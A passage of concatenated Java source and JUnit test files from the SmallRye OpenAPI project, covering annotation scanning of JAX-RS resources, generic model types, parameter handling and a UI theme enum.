DotName.createSimple("javax.annotation.security.PermitAll"),
DotName.createSimple("jakarta.annotation.security.PermitAll"));
public static final List<DotName> DENY_ALL = Arrays.asList(
DotName.createSimple("javax.annotation.security.DenyAll"),
DotName.createSimple("jakarta.annotation.security.DenyAll"));
private SecurityConstants() {
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/runtime/io/CurrentScannerInfo.java<|end_filename|>
package io.smallrye.openapi.runtime.io;
import org.jboss.jandex.Type;
import io.smallrye.openapi.runtime.scanner.spi.AnnotationScanner;
/**
* A simple registry to hold the current scanner info
*
* @author <NAME> (<EMAIL>)
*/
public class CurrentScannerInfo {
private static final ThreadLocal<CurrentScannerInfo> current = new ThreadLocal<>();
public static void register(AnnotationScanner annotationScanner) {
CurrentScannerInfo registry = new CurrentScannerInfo(annotationScanner);
current.set(registry);
}
public static AnnotationScanner getCurrentAnnotationScanner() {
CurrentScannerInfo info = current.get();
return info != null ? info.annotationScanner : null;
}
public static void setCurrentConsumes(final String[] currentConsumes) {
current.get().currentConsumes = currentConsumes;
}
public static String[] getCurrentConsumes() {
return current.get().currentConsumes;
}
public static void setCurrentProduces(final String[] currentProduces) {
current.get().currentProduces = currentProduces;
}
public static String[] getCurrentProduces() {
return current.get().currentProduces;
}
public static void remove() {
current.remove();
}
public static boolean isWrapperType(Type type) {
AnnotationScanner scanner = getCurrentAnnotationScanner();
return scanner != null && scanner.isWrapperType(type);
}
public static boolean isScannerInternalResponse(Type type) {
AnnotationScanner scanner = getCurrentAnnotationScanner();
return scanner != null && scanner.isScannerInternalResponse(type);
}
private String[] currentConsumes;
private String[] currentProduces;
private final AnnotationScanner annotationScanner;
private CurrentScannerInfo(final AnnotationScanner annotationScanner) {
this.annotationScanner = annotationScanner;
this.currentConsumes = null;
this.currentProduces = null;
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/XmlAccessTypePublicMember.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import javax.xml.bind.annotation.XmlAccessType;
import javax.xml.bind.annotation.XmlAccessorType;
@XmlAccessorType(value = XmlAccessType.PUBLIC_MEMBER)
public class XmlAccessTypePublicMember {
public String prop1Field;
@SuppressWarnings(value = "unused")
private String prop2Field;
public String getProp3Property() {
return null;
}
}
<|start_filename|>ui/open-api-ui/src/main/java/io/smallrye/openapi/ui/ThemeHref.java<|end_filename|>
package io.smallrye.openapi.ui;
/**
* Available themes
*
* @author <NAME> (<EMAIL>)
*/
public enum ThemeHref {
original,
feeling_blue,
flattop,
material,
monokai,
muted,
newspaper,
outline;
@Override
public String toString() {
switch (this) {
case feeling_blue:
return String.format(FORMAT, "feeling-blue");
case flattop:
return String.format(FORMAT, "flattop");
case material:
return String.format(FORMAT, "material");
case monokai:
return String.format(FORMAT, "monokai");
case muted:
return String.format(FORMAT, "muted");
case newspaper:
return String.format(FORMAT, "newspaper");
case outline:
return String.format(FORMAT, "outline");
default:
return null;
}
}
private static final String FORMAT = "theme-%s.css";
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/BeanParamBase.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.QueryParam;
public class BeanParamBase implements BeanParamAddon {
@QueryParam(value = "qc1")
String qc1;
@Override
public void setHeaderParam1(String value) {
}
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/GenericModelTypesResourceTest.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import java.util.HashMap;
import java.util.List;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.jandex.Index;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
import io.smallrye.openapi.api.constants.OpenApiConstants;
class GenericModelTypesResourceTest extends IndexScannerTestBase {
/*
* Test case derived from original example in Smallrye OpenAPI issue #25.
*
* https://github.com/smallrye/smallrye-open-api/issues/25
*
*/
@Test
void testJavaxGenericsApplication() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.BaseModel.class,
test.io.smallrye.openapi.runtime.scanner.BaseResource.class,
test.io.smallrye.openapi.runtime.scanner.KingCrimson.class,
test.io.smallrye.openapi.runtime.scanner.KingCrimsonResource.class,
test.io.smallrye.openapi.runtime.scanner.Magma.class,
test.io.smallrye.openapi.runtime.scanner.MagmaResource.class,
test.io.smallrye.openapi.runtime.scanner.Message.class,
test.io.smallrye.openapi.runtime.scanner.OpenAPIConfig.class,
test.io.smallrye.openapi.runtime.scanner.Residents.class,
test.io.smallrye.openapi.runtime.scanner.ResidentsResource.class,
test.io.smallrye.openapi.runtime.scanner.Result.class,
test.io.smallrye.openapi.runtime.scanner.ResultList.class,
test.io.smallrye.openapi.runtime.scanner.POJO.class,
List.class);
testGenericsApplication(i);
}
@Test
void testJakartaGenericsApplication() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.BaseModel.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.BaseResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.KingCrimson.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.KingCrimsonResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Magma.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.MagmaResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Message.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.OpenAPIConfig.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Residents.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.ResidentsResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Result.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.ResultList.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.POJO.class,
List.class);
testGenericsApplication(i);
}
void testGenericsApplication(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(dynamicConfig(new HashMap<String, Object>()), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.generic-model-types.json", result);
}
@Test
void testJavaxGenericsApplicationWithoutArrayRefs() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.BaseModel.class,
test.io.smallrye.openapi.runtime.scanner.BaseResource.class,
test.io.smallrye.openapi.runtime.scanner.KingCrimson.class,
test.io.smallrye.openapi.runtime.scanner.KingCrimsonResource.class,
test.io.smallrye.openapi.runtime.scanner.Magma.class,
test.io.smallrye.openapi.runtime.scanner.MagmaResource.class,
test.io.smallrye.openapi.runtime.scanner.Message.class,
test.io.smallrye.openapi.runtime.scanner.OpenAPIConfig.class,
test.io.smallrye.openapi.runtime.scanner.Residents.class,
test.io.smallrye.openapi.runtime.scanner.ResidentsResource.class,
test.io.smallrye.openapi.runtime.scanner.Result.class,
test.io.smallrye.openapi.runtime.scanner.ResultList.class,
test.io.smallrye.openapi.runtime.scanner.POJO.class,
List.class);
testGenericsApplicationWithoutArrayRefs(i);
}
@Test
void testJakartaGenericsApplicationWithoutArrayRefs() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.BaseModel.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.BaseResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.KingCrimson.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.KingCrimsonResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Magma.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.MagmaResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Message.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.OpenAPIConfig.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Residents.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.ResidentsResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Result.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.ResultList.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.POJO.class,
List.class);
testGenericsApplicationWithoutArrayRefs(i);
}
void testGenericsApplicationWithoutArrayRefs(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(
dynamicConfig(OpenApiConstants.SMALLRYE_ARRAY_REFERENCES_ENABLE,
Boolean.FALSE),
i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.generic-model-types-wo-array-refs.json", result);
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/Canine.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public interface Canine {
@Schema(name = "c_name", description = "The name of the canine", maxLength = 50)
public String getName();
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ParameterInBeanFromFieldTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.BeanParam;
import javax.ws.rs.DefaultValue;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
@Path(value = "/parameter-in-bean-from-field/{id}")
public class ParameterInBeanFromFieldTestResource {
public static class Bean {
@PathParam(value = "id")
@DefaultValue(value = "BEAN")
String id;
}
@BeanParam
private Bean param;
@GET
@Produces(value = MediaType.APPLICATION_JSON)
public Widget get() {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/MatrixParamsOnResourceMethodArgsTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.validation.constraints.NotNull;
import javax.validation.constraints.Size;
import javax.ws.rs.DefaultValue;
import javax.ws.rs.GET;
import javax.ws.rs.MatrixParam;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
@Path(value = "/matrix-params-on-resource-method-args/{id}")
@SuppressWarnings(value = "unused")
public class MatrixParamsOnResourceMethodArgsTestResource {
@PathParam(value = "id")
@NotNull
@Size(max = 10)
String id;
@GET
@Path(value = "/anotherpathsegment/reloaded/")
@Produces(value = MediaType.APPLICATION_JSON)
public Widget get(@MatrixParam(value = "m1") @DefaultValue(value = "default-m1") String m1,
@MatrixParam(value = "m2") @Size(min = 20) String m2) {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/Sub1TestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import java.util.Map;
import jakarta.ws.rs.Consumes;
import jakarta.ws.rs.GET;
import jakarta.ws.rs.PATCH;
import jakarta.ws.rs.POST;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.QueryParam;
import jakarta.ws.rs.core.MediaType;
@SuppressWarnings(value = "unused")
public class Sub1TestResource<T> {
@QueryParam(value = "q2")
T q2;
@GET
public String get(@QueryParam(value = "q3") String q3) {
return null;
}
@PATCH
@Consumes(value = MediaType.TEXT_PLAIN)
public void update(String value) {
return;
}
@POST
@Consumes(value = MediaType.APPLICATION_JSON)
public void create(Map<String, CharSequence> attributes) {
return;
}
@Path(value = "/sub2")
public Sub2TestResource<T> getSub2() {
return new Sub2TestResource<T>();
}
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/ResourceParameterTests.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import java.time.LocalTime;
import java.time.OffsetTime;
import java.util.HashMap;
import java.util.Set;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.jandex.Index;
import org.jboss.jandex.IndexView;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
import io.smallrye.openapi.api.OpenApiConfig;
import io.smallrye.openapi.api.constants.OpenApiConstants;
/**
* @author <NAME> {@literal <<EMAIL>>}
*/
class ResourceParameterTests extends JaxRsDataObjectScannerTestBase {
/*
* Test case derived from original example in Smallrye OpenAPI issue #25.
*
* https://github.com/smallrye/smallrye-open-api/issues/25
*
*/
@Test
void testJavaxParameterResource() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.resources.ParameterResource.class);
testParameterResource(i);
}
@Test
void testJakartaParameterResource() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.resources.jakarta.ParameterResource.class);
testParameterResource(i);
}
void testParameterResource(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(dynamicConfig(new HashMap<String, Object>()), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.parameters.simpleSchema.json", result);
}
/*
* Test case derived from original example in Smallrye OpenAPI issue #165.
*
* https://github.com/smallrye/smallrye-open-api/issues/165
*
*/
@Test
void testJavaxPrimitiveArraySchema() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.PrimitiveArraySchemaTestResource.class,
test.io.smallrye.openapi.runtime.scanner.PrimitiveArraySchemaTestResource.PrimitiveArrayTestObject.class);
testPrimitiveArraySchema(i);
}
@Test
void testJakartaPrimitiveArraySchema() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.PrimitiveArraySchemaTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.PrimitiveArraySchemaTestResource.PrimitiveArrayTestObject.class);
testPrimitiveArraySchema(i);
}
void testPrimitiveArraySchema(Index i) throws IOException, JSONException {
OpenApiConfig config = emptyConfig();
IndexView filtered = new FilteredIndexView(i, config);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(config, filtered);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.parameters.primitive-array-schema.json", result);
}
@Test
void testJavaxPrimitiveArrayParameter() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.PrimitiveArrayParameterTestResource.class);
testPrimitiveArrayParameter(i);
}
@Test
void testJakartaPrimitiveArrayParameter() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.PrimitiveArrayParameterTestResource.class);
testPrimitiveArrayParameter(i);
}
void testPrimitiveArrayParameter(Index i) throws IOException, JSONException {
OpenApiConfig config = emptyConfig();
IndexView filtered = new FilteredIndexView(i, config);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(config, filtered);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.parameters.primitive-array-param.json", result);
}
@Test
void testJavaxPrimitiveArrayPolymorphism() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.PrimitiveArrayPolymorphismTestResource.class);
testPrimitiveArrayPolymorphism(i);
}
@Test
void testJakartaPrimitiveArrayPolymorphism() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.PrimitiveArrayPolymorphismTestResource.class);
testPrimitiveArrayPolymorphism(i);
}
void testPrimitiveArrayPolymorphism(Index i) throws IOException, JSONException {
OpenApiConfig config = emptyConfig();
IndexView filtered = new FilteredIndexView(i, config);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(config, filtered);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.parameters.primitive-array-polymorphism.json", result);
}
/*
* Test case derived from original example in Smallrye OpenAPI issue #201.
*
* https://github.com/smallrye/smallrye-open-api/issues/201
*
*/
@Test
void testJavaxSchemaImplementationType() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.SchemaImplementationTypeResource.class,
test.io.smallrye.openapi.runtime.scanner.SchemaImplementationTypeResource.GreetingMessage.class,
test.io.smallrye.openapi.runtime.scanner.SchemaImplementationTypeResource.SimpleString.class);
testSchemaImplementationType(i);
}
@Test
void testJakartaSchemaImplementationType() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.SchemaImplementationTypeResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.SchemaImplementationTypeResource.GreetingMessage.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.SchemaImplementationTypeResource.SimpleString.class);
testSchemaImplementationType(i);
}
void testSchemaImplementationType(Index i) throws IOException, JSONException {
OpenApiConfig config = emptyConfig();
IndexView filtered = new FilteredIndexView(i, config);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(config, filtered);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.parameters.string-implementation-wrapped.json", result);
}
/*
* Test case derived for Smallrye OpenAPI issue #233.
*
* https://github.com/smallrye/smallrye-open-api/issues/233
*
*/
@Test
void testJavaxTimeResource() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.TimeTestResource.class,
test.io.smallrye.openapi.runtime.scanner.TimeTestResource.UTC.class, LocalTime.class, OffsetTime.class);
testTimeResource(i);
}
@Test
void testJakartaTimeResource() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.TimeTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.TimeTestResource.UTC.class, LocalTime.class, OffsetTime.class);
testTimeResource(i);
}
void testTimeResource(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(dynamicConfig(new HashMap<String, Object>()), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.parameters.time.json", result);
}
/*
* Test case derived from original example in SmallRye OpenAPI issue #237.
*
* https://github.com/smallrye/smallrye-open-api/issues/237
*
*/
@Test
void testJavaxTypeVariableResponse() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.TypeVariableResponseTestResource.class,
test.io.smallrye.openapi.runtime.scanner.TypeVariableResponseTestResource.Dto.class);
testTypeVariableResponse(i);
}
@Test
void testJakartaTypeVariableResponse() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.TypeVariableResponseTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.TypeVariableResponseTestResource.Dto.class);
testTypeVariableResponse(i);
}
void testTypeVariableResponse(Index i) throws IOException, JSONException {
OpenApiConfig config = emptyConfig();
IndexView filtered = new FilteredIndexView(i, config);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(config, filtered);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.parameters.type-variable.json", result);
}
/*
* Test case derived from original example in SmallRye OpenAPI issue #248.
*
* https://github.com/smallrye/smallrye-open-api/issues/248
*
*/
@Test
void testJavaxResponseTypeUnindexed() throws IOException, JSONException {
// Index is intentionally missing ResponseTypeUnindexedTestResource$ThirdPartyType
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.ResponseTypeUnindexedTestResource.class);
testResponseTypeUnindexed(i);
}
@Test
void testJakartaResponseTypeUnindexed() throws IOException, JSONException {
// Index is intentionally missing ResponseTypeUnindexedTestResource$ThirdPartyType
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.ResponseTypeUnindexedTestResource.class);
testResponseTypeUnindexed(i);
}
void testResponseTypeUnindexed(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("responses.unknown-type.empty-schema.json", result);
}
/*
* Test cases derived from original example in SmallRye OpenAPI issue #260.
*
* https://github.com/smallrye/smallrye-open-api/issues/260
*
*/
@Test
void testJavaxGenericSetResponseWithSetIndexed() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.FruitResource.class,
test.io.smallrye.openapi.runtime.scanner.Fruit.class, test.io.smallrye.openapi.runtime.scanner.Seed.class,
Set.class);
testGenericSetResponseWithSetIndexed(i);
}
@Test
void testJakartaGenericSetResponseWithSetIndexed() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.FruitResource.class,
test.io.smallrye.openapi.runtime.scanner.Fruit.class,
test.io.smallrye.openapi.runtime.scanner.Seed.class,
Set.class);
testGenericSetResponseWithSetIndexed(i);
}
void testGenericSetResponseWithSetIndexed(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("responses.generic-collection.set-indexed.json", result);
}
@Test
void testJavaxGenericSetResponseWithSetIndexedWithoutArrayRefs() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.FruitResource.class,
test.io.smallrye.openapi.runtime.scanner.Fruit.class,
test.io.smallrye.openapi.runtime.scanner.Seed.class,
Set.class);
testGenericSetResponseWithSetIndexedWithoutArrayRefs(i);
}
@Test
void testJakartaGenericSetResponseWithSetIndexedWithoutArrayRefs() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.FruitResource.class,
test.io.smallrye.openapi.runtime.scanner.Fruit.class,
test.io.smallrye.openapi.runtime.scanner.Seed.class,
Set.class);
testGenericSetResponseWithSetIndexedWithoutArrayRefs(i);
}
void testGenericSetResponseWithSetIndexedWithoutArrayRefs(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(
dynamicConfig(OpenApiConstants.SMALLRYE_ARRAY_REFERENCES_ENABLE,
Boolean.FALSE),
i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("responses.generic-collection.set-indexed-wo-array-refs.json", result);
}
@Test
void testJavaxGenericSetResponseWithSetUnindexed() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.FruitResource.class,
test.io.smallrye.openapi.runtime.scanner.Fruit.class,
test.io.smallrye.openapi.runtime.scanner.Seed.class);
testGenericSetResponseWithSetUnindexed(i);
}
@Test
void testJakartaGenericSetResponseWithSetUnindexed() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.FruitResource.class,
test.io.smallrye.openapi.runtime.scanner.Fruit.class,
test.io.smallrye.openapi.runtime.scanner.Seed.class);
testGenericSetResponseWithSetUnindexed(i);
}
void testGenericSetResponseWithSetUnindexed(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("responses.generic-collection.set-unindexed.json", result);
}
/*
* Test case derived from original example in SmallRye OpenAPI issue #239.
*
* https://github.com/smallrye/smallrye-open-api/issues/239
*
*/
@Test
void testJavaxBeanParamMultipartFormInheritance() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.BeanParamMultipartFormInheritanceResource.class,
test.io.smallrye.openapi.runtime.scanner.MultipartFormVerify.class,
test.io.smallrye.openapi.runtime.scanner.MultipartFormUploadIconForm.class,
test.io.smallrye.openapi.runtime.scanner.BeanParamBase.class,
test.io.smallrye.openapi.runtime.scanner.BeanParamImpl.class,
test.io.smallrye.openapi.runtime.scanner.BeanParamAddon.class);
testBeanParamMultipartFormInheritance(i);
}
@Test
void testJakartaBeanParamMultipartFormInheritance() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.BeanParamMultipartFormInheritanceResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.MultipartFormVerify.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.MultipartFormUploadIconForm.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.BeanParamBase.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.BeanParamImpl.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.BeanParamAddon.class);
testBeanParamMultipartFormInheritance(i);
}
void testBeanParamMultipartFormInheritance(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("params.beanparam-multipartform-inherited.json", result);
}
/*
* Test case derived from original example in SmallRye OpenAPI issue #330.
*
* https://github.com/smallrye/smallrye-open-api/issues/330
*
*/
@Test
void testJavaxMethodTargetParametersWithoutJAXRS() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.MethodTargetParametersResource.class,
test.io.smallrye.openapi.runtime.scanner.MethodTargetParametersResource.PagedResponse.class);
testMethodTargetParametersWithoutJAXRS(i);
}
@Test
void testJakartaMethodTargetParametersWithoutJAXRS() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.MethodTargetParametersResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.MethodTargetParametersResource.PagedResponse.class);
testMethodTargetParametersWithoutJAXRS(i);
}
void testMethodTargetParametersWithoutJAXRS(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("params.method-target-nojaxrs.json", result);
}
/*
* Test case derived from original example in SmallRye OpenAPI issue #437.
*
* https://github.com/smallrye/smallrye-open-api/issues/437
*
*/
@Test
void testJavaxJsonbTransientOnSetterGeneratesReadOnly() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.Policy437Resource.class,
test.io.smallrye.openapi.runtime.scanner.Policy437.class);
testJsonbTransientOnSetterGeneratesReadOnly(i);
}
@Test
void testJakartaJsonbTransientOnSetterGeneratesReadOnly() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.Policy437Resource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Policy437.class);
testJsonbTransientOnSetterGeneratesReadOnly(i);
}
void testJsonbTransientOnSetterGeneratesReadOnly(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("responses.hidden-setter-readonly-props.json", result);
}
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/util/JandexUtilTests.java<|end_filename|>
package io.smallrye.openapi.runtime.util;
import static org.junit.jupiter.api.Assertions.assertEquals;
import java.util.Arrays;
import javax.ws.rs.Path;
import org.eclipse.microprofile.openapi.annotations.media.Content;
import org.eclipse.microprofile.openapi.annotations.responses.APIResponse;
import org.eclipse.microprofile.openapi.models.media.Encoding;
import org.jboss.jandex.AnnotationInstance;
import org.jboss.jandex.AnnotationValue;
import org.jboss.jandex.ClassInfo;
import org.jboss.jandex.DotName;
import org.jboss.jandex.Index;
import org.junit.jupiter.api.Test;
import io.smallrye.openapi.runtime.scanner.IndexScannerTestBase;
import io.smallrye.openapi.runtime.util.JandexUtil.RefType;
class JandexUtilTests {
@Test
void testEnumValue() {
Index index = IndexScannerTestBase.indexOf(Implementor2.class);
ClassInfo clazz = index.getClassByName(DotName.createSimple(Implementor2.class.getName()));
AnnotationInstance annotation = clazz.method("getData")
.annotation(DotName.createSimple(APIResponse.class.getName()))
.value("content")
.asNestedArray()[0]
.value("encoding")
.asNestedArray()[0];
Encoding.Style style = JandexUtil.enumValue(annotation, "style", Encoding.Style.class);
assertEquals(Encoding.Style.PIPE_DELIMITED, style);
}
@Test
void testRefValueWithHttpUrl() {
String ref = "https://www.example.com/openapi";
AnnotationInstance annotation = AnnotationInstance.create(DotName.createSimple(""),
null,
Arrays.asList(AnnotationValue.createStringValue("ref", ref)));
String outRef = JandexUtil.refValue(annotation, RefType.LINK);
assertEquals(ref, outRef);
}
@Test
void testRefValueWithRelativeUrl() {
String ref = "./additional-schemas.json";
AnnotationInstance annotation = AnnotationInstance.create(DotName.createSimple(""),
null,
Arrays.asList(AnnotationValue.createStringValue("ref", ref)));
String outRef = JandexUtil.refValue(annotation, RefType.LINK);
assertEquals(ref, outRef);
}
@Test
void testRefValueWithValidLinkName() {
String ref = "L1nk.T0_Something-Useful";
AnnotationInstance annotation = AnnotationInstance.create(DotName.createSimple(""),
null,
Arrays.asList(AnnotationValue.createStringValue("ref", ref)));
String outRef = JandexUtil.refValue(annotation, RefType.LINK);
assertEquals("#/components/links/L1nk.T0_Something-Useful", outRef);
}
// TODO: Re implement this maybe ?
// @Test
// void testGetJaxRsResourceClasses() {
// Index index = IndexScannerTestBase.indexOf(I1.class, I2.class, Implementor1.class, Implementor2.class);
// Collection<ClassInfo> resources = JandexUtil.getJaxRsResourceClasses(index);
// assertEquals(3, resources.size());
// assertTrue(resources.contains(index.getClassByName(DotName.createSimple(I2.class.getName()))));
// assertTrue(resources.contains(index.getClassByName(DotName.createSimple(Implementor1.class.getName()))));
// assertTrue(resources.contains(index.getClassByName(DotName.createSimple(Implementor2.class.getName()))));
// }
@Path("interface1")
interface I1 {
@Path("method1")
public String getData();
}
@Path("interface2")
interface I2 {
@Path("method1")
public String getData();
}
@Path("implementation1")
static abstract class Implementor1 implements I1 {
}
@Path("implementation2")
static class Implementor2 implements I2 {
@Override
@APIResponse(content = @Content(encoding = @org.eclipse.microprofile.openapi.annotations.media.Encoding(style = "pipeDelimited")))
public String getData() {
return null;
}
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ResponseMultipartGenerationTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.Consumes;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
